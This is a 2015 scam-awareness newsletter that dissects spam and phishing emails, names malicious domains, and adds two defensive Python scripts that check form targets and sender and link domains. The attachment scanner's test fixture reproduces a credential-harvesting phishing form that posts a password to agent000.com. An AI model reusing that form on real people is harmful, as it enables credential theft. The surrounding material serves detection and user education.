

November 11, 2015

THE WEEK IN REVIEW

During the past week criminal gangs that push out scam spam (say that 3 times fast!) launched a Scampaign. One of our subscribing organizations sent us this screen shot of thousands of emails hitting their server. Nearly all of them were scam spam. Have a look at the blue bar for November 6.

This is just one of millions of daily online criminal events that governments and law enforcement across the world are unable to do anything about. We are all held hostage by an organization called ICANN. They are the ineffective governing body in charge of the Internet’s domain naming system and they appear to be unable (or unwilling) to do anything to protect netizens from misuse like this or the many other ways in which criminals target people through domain misuse.

Sample Scam Subject Lines:

Attn: View your Experian credit score for $0

Best offer here

CANCUN IS WAITING; compare travel packages, HERE

Congratulations on your Amazon Prime Christmas Voucher

CNNHealth Report- Millionaires, Entrepreneurs Using the Brain Pill Advantage

Curb the addiction Live cigarette free

Dash Cam Pro The Personal Security Camera For Your Car

Don’t let your Amazon points expire

GOOD DAY TO YOU

Harvard Study: 1 in 3 people will die of heart disease

Hi look at my naked photos!

Mailbox

Re: CLEARANCE: Beats Pro Over-Ear-Heaphones $12.67, Thru November 7, 2015

Sample Scam Email Addresses:

Amazon.Customer.Appreciation@rtsmithes.xyz

BaddictionHelp@signingwhile.download

CheapWristbands@nonafilliated.download
CulinaryInstitute@ghlying.download

Dr.Mark.Stengler@synchouse.xyz

FindALawyer@caufight.download

Holiday-Special@seachess.xyz

MoveForLess@oophorectomize.dowload

NonProfitJobs@articulatory.download

OnlineEducationToday@colorators.download

Santa_Gift_Points@socialtheft.xyz

US-Army-Survival-Tool@uizse.xyz

VacationtoHawaii@youngolder.xyz


Phish NETS: Apple Global Service Exchange and Web Mail

For businesses and institutions that want to handle their own Apple Computer repairs and service there is something called the Apple Global Service Exchange, or GSX. Have a look at this email from gsx.notification@update.com (Not from Apple.com!). The email contains an attached web document designed to collect lots of personal information and to look like it is related to Apple’s legitimate GSX site, but with one very small but extremely important difference…

The gsx_form_verification.htm file contains lots of web code, including an input form whose action attribute tells the browser where to send all your personal data. Here is a small screenshot of that portion of the file. It says action="http://agent000.com/media/dl.php" method="post". This means that all your precious personal data will be sent to a website named agent000.com.
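The check described above can be automated for any HTML attachment: parse the file, pull out every form’s action URL, and compare the host it posts to against the domains the message claims to represent. The following is an added example (not code from the newsletter or from Apple); the sample attachment is constructed, with only the action URL taken from the text above and the field names made up.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the gsx_form_verification.htm attachment: only the
# action URL comes from the newsletter; the input field names are made up.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>GSX Account Verification</h2>
<form action="http://agent000.com/media/dl.php" method="post">
  <input type="text" name="full_name">
  <input type="text" name="apple_id">
  <input type="password" name="password">
  <input type="submit" value="Verify">
</form>
</body></html>
"""


class FormActionScanner(HTMLParser):
    """Record every <form>: where it submits and which named inputs it carries."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            self._current["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_is_trusted(host, trusted_domains):
    """True when host is one of the trusted domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def scan_html_attachment(html_text, trusted_domains):
    """Return one finding per form: the host it submits to and a verdict."""
    parser = FormActionScanner()
    parser.feed(html_text)
    parser.close()
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if not host:
            verdict = "relative action: posts wherever the file is opened from"
        elif host_is_trusted(host, trusted_domains):
            verdict = "ok"
        else:
            verdict = "SUSPICIOUS: posts personal data to untrusted host"
        findings.append({
            "action_host": host,
            "method": form["method"],
            "fields": form["fields"],
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE_ATTACHMENT, ["apple.com"]):
        print(finding)
```

Run against the sample, the scanner reports a single form posting a password field to agent000.com, which is not apple.com or any subdomain of it; that mismatch is the "one very small but extremely important difference" the column points at, and it can be checked before anyone opens the attachment in a browser.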

3-GSX Apple notification form code to website

According to a WHOIS lookup, agent000.com is “ENielsen’s Blog-o-rrific Blogarama” website and Google shows it as a “commuter bike” site. Looks like they’ve been hacked. What does VirusTotal.com think of it? Their message couldn’t be more clear.

Delete….

Many people who own websites use web-based email through their website providers. That’s who these next two phishing scams target. They want to capture the login information for web-based emails so they can use the accounts to push out more scam spam, no doubt. By the way, how is your world geography? Look at the mouse-over produced in this first email when the mouse hovers over “please click here now.” Do you see the 2-letter country code revealed in the link? But where is “.ro” in the world? (Answer is at the bottom of this column.)

5-Password notification

The second phishing scam is very poorly written and lame. No one will EVER ask you to provide your password to anything in an email. And if they do, it means it isn’t legitimate!

Just delete!

6-Upgrading all staff mailbox

(Country code answer: .ro = hosted in Romania!)

Your Money: Best Deals on SUVs and Home Wireless Security Cameras

This is a test of your powers of observation as we follow these next two scams down their rabbit holes…

Considering the purchase of an SUV? How about this overstocked lot offering the best deals on new and used SUVs? Just click the links “Choose your Make” and “SEARCH TO CHECK AVAILABILITY.” And then kiss your computer goodbye… The email was sent from, and connects to, a domain called aimederal.com.

7-Best deals on new and used SUVs

A WHOIS lookup of aimederal.com shows that it was registered on November 4, the day the email was sent, through the registrar Enom.com to someone named Greg Shaw in Los Angeles, CA. But no website can be found there. (Don’t confuse this site with aimfederal.com.) We asked the Zulu URL Risk Analyzer to have a look and it identified the site as 100% malicious…

8-Best deals on new and used SUVs zulu score

Need a home security camera? Readers in urban, and even suburban, areas who routinely receive package deliveries to their homes have probably heard about the growing problem of package theft from their porch or front door. That explains why many homeowners are installing inexpensive home video cameras. This email about home security plans couldn’t be more timely. It was sent from Home-Protection@jenkirches.com with links to the same domain. Notice the white text against the white background we found at the bottom of the email. The first paragraph of this hidden text came from an article titled “Trumpeter’s Neck Swells Like a Bullfrog” that we found on LiveScience.com.

9-Home wireless security camera

A Google search for the “subdomain.domain” of the link in this email turns up nothing. We then asked the Zulu URL Risk Analyzer to look at the link in the email and it reported it as suspicious. (Check out our article on how to use the Zulu URL Risk Analyzer!) Be sure to have a close look at the Zulu results…

10-Home wireless security camera -Google search

11-Home wireless security camera zulu score1

Zulu shows that a visit to the website offered through the link in the home security email also contains a redirect to another website named destinationclass.com. Does this sound familiar? How closely did you look at the first scam above for SUVs that was received 2 days earlier? Did you notice that the Zulu URL Risk Analyzer also showed that the malicious website aimederal.com also contained a redirect to destinationclass.com? What does Zulu think about the links for destinationclass.com?

12-Home wireless security camera zulu score 2 redirect

Harmless?? We seriously doubt that! Zulu is good but not perfect. What can Google tell us about destinationclass.com? It found a website but had absolutely nothing to say about the website. Zero. We asked a WHOIS about destinationclass.com and learned that it was registered back in 2010 through a U.S.-based Privacy Protection Service, so without a court order we’ll never know who owns the website. This is where the rabbit hole gets very deep and dark. Our advice?

Stay away from DestinationClass.com as well, and…

Delete, delete, delete!

13-Home wireless security camera google search 2


TOP STORY: Why is This Legitimate Email?

We spend so much time educating our readers about scam posts, texts and emails that sometimes it is important to point out why something is legitimate. Take the email from Dunkin Donuts below as our example. “Thank you for registering your DD Card.” It looks like it could be a perfect target for scammers but this email is legitimate. Look at it carefully. What things do you spot that tell you it’s OK?

14-LEGIT DD Card


Let’s break it down…

  1. The email comes from a long, weird email address, but nothing in front of the “@” symbol is important. Focus on the text after the @: email.dunkindonuts.com. The dot-com is called the Global Top Level Domain (gTLD) and the domain is found immediately in front of it, separated by a period. And what’s the domain? DunkinDonuts. The “bounce” and “email” (separated by periods) are called subdomains and are not important. This email from Dunkin Donuts appears to have been sent from dunkindonuts.com. As it should! However, email addresses can be spoofed by the best criminal gangs, so this isn’t proof positive, just reassuring.
  2. Look at the email itself. Dear… It identifies the recipient by first name. “Thanks for registering your Dunkin’ Donuts card 611…” The recipient of this email did recently register a DD Card, so the email isn’t unexpected! And his first name matched the email.
  3. A mouse-over of every single link in the email points back to dunkindonuts.com. Look at the mouse-over above captured from “>>Find a Dunkin’”. It appears to point to a website called click.email.dunkindonuts.com/(bunch of characters). The bunch of characters that follow the first single forward slash are not important at all. Neither are the subdomains click and email. The only important part to notice is the domain and gTLD: dunkindonuts.com.
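The three-step breakdown above (ignore everything before the @, ignore subdomains, ignore everything after the first single slash, then compare the domain-plus-TLD of the sender and of every link against the brand the message claims) is mechanical enough to write down as code. The same rule also answers the geography question in the web-mail phish earlier in this issue: a two-letter TLD such as .ro is a country code. The following is an added example, not the newsletter’s own tool; the sender local part, link path and the .ro host are constructed, and the code assumes a plain gTLD like .com (two-part suffixes such as co.uk would need the Public Suffix List, which it does not use).

```python
from urllib.parse import urlparse


def _host_of(host_or_url):
    """Accept either a bare host, a mouse-over style 'host/path', or a full URL."""
    if "//" not in host_or_url:
        host_or_url = "http://" + host_or_url  # bare host/path, as shown in a mouse-over
    return (urlparse(host_or_url).hostname or "").lower().rstrip(".")


def registrable_domain(host):
    """The newsletter's rule: the domain is the label immediately before the
    top-level domain; any labels to the left are subdomains and do not matter.
    Assumption: single-label TLD (.com, .xyz, .ro); co.uk-style suffixes are out of scope."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def sender_domain(address):
    """Nothing in front of the @ matters; judge only what follows it."""
    return registrable_domain(address.rsplit("@", 1)[-1])


def link_domain(url):
    """Drop the scheme, the path after the first single slash and the query string;
    keep the host and reduce it to domain + TLD."""
    return registrable_domain(_host_of(url))


def top_level_domain(host_or_url):
    """Return the last label of the host, e.g. 'ro' for a .ro link."""
    return _host_of(host_or_url).rsplit(".", 1)[-1]


def is_country_code_tld(host_or_url):
    """Two-letter TLDs are country codes (.ro, .uk, ...); .com, .xyz, .download are not."""
    t = top_level_domain(host_or_url)
    return len(t) == 2 and t.isalpha()


def check_email(sender, links, claimed_domain):
    """Compare the sender address and every link against the domain the message
    claims to come from; returns per-link detail plus an overall verdict."""
    claimed = claimed_domain.lower()
    link_results = []
    for url in links:
        d = link_domain(url)
        link_results.append({
            "url": url,
            "domain": d,
            "matches": d == claimed,
            "country_code_tld": is_country_code_tld(url),
        })
    s = sender_domain(sender)
    sender_ok = s == claimed
    return {
        "sender_domain": s,
        "sender_matches": sender_ok,
        "links": link_results,
        "all_match": sender_ok and all(r["matches"] for r in link_results),
    }


if __name__ == "__main__":
    # Constructed inputs modelled on this issue's examples: the hosts are the ones
    # the column discusses, the local part, path and .ro host are made up.
    print(check_email("bounce-12345@email.dunkindonuts.com",
                      ["http://click.email.dunkindonuts.com/abc123XYZ?u=1"],
                      "dunkindonuts.com"))
    print(check_email("gsx.notification@update.com", [], "apple.com"))
    print(is_country_code_tld("http://webmail-login.example.ro/verify"))
```

The Dunkin’ Donuts message comes back with every link and the sender reduced to dunkindonuts.com, while the GSX sender reduces to update.com rather than apple.com. As the column notes, a matching sender is reassuring but not proof, since the From address can be spoofed; a mismatch, on the other hand, is a reason to stop.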

In today’s day and age of Internet deceit and trickery, it’s always important to verify the emails that pour into your inbox. To learn more about what makes something legitimate, read our article Why is this legitimate?

FOR YOUR SAFETY: Amazon Order Confirmation, Dropbox Shared Document

Though it was received in October, a reader recently sent us this malicious email, and we felt it worth sharing with our readers. “Your Amazon.com order confirmation for [your name]” is a very well disguised threat meant to infect your computer. Everything about this email looked legitimate. However, look carefully at what the sender asked you to do… “Please find attached the billing confirmation receipt.” (Notice the awkward English.) The attached “receipt” was a zip file containing malicious software.

Delete!

15-Amazon order confirmation - iPhone 6

This next email came from a legitimate user’s email account “(name) Has Shared A Document” and the email is signed “Thank you!” from the Dropbox Team. Dropbox is a free online service for sharing documents. But our sender was a criminal misusing a hacked personal email account. We moused over the link “View Document Now” to find that it doesn’t point to Dropbox.com. The link points to a strange website called kefu580.com. Have a look below at what VirusTotal.com thought about this link. We don’t often see such a strong collective opinion from VirusTotal.

Now delete!

16-Dropbox shared document


17-Dropbox shared doc virustotal score


ON THE LIGHTER SIDE: Your Next of Kin Died in a Car Accident

This week’s “on the lighter side” column may seem like an oxymoron because I received some terribly sad news. Apparently my “next of kin” in Nigeria told the United Nations Committee that I died last week in a car accident in Nigeria. Boo-hoo. The President of Nigeria is asking me to confirm that I am dead. If none of this makes sense to you, try reading the email below while I look for a necromancer so I can speak with the living and claim my money. (And we loved the sender’s right-to-the-point email address: callme@gmail.com)

Until next week, surf safely!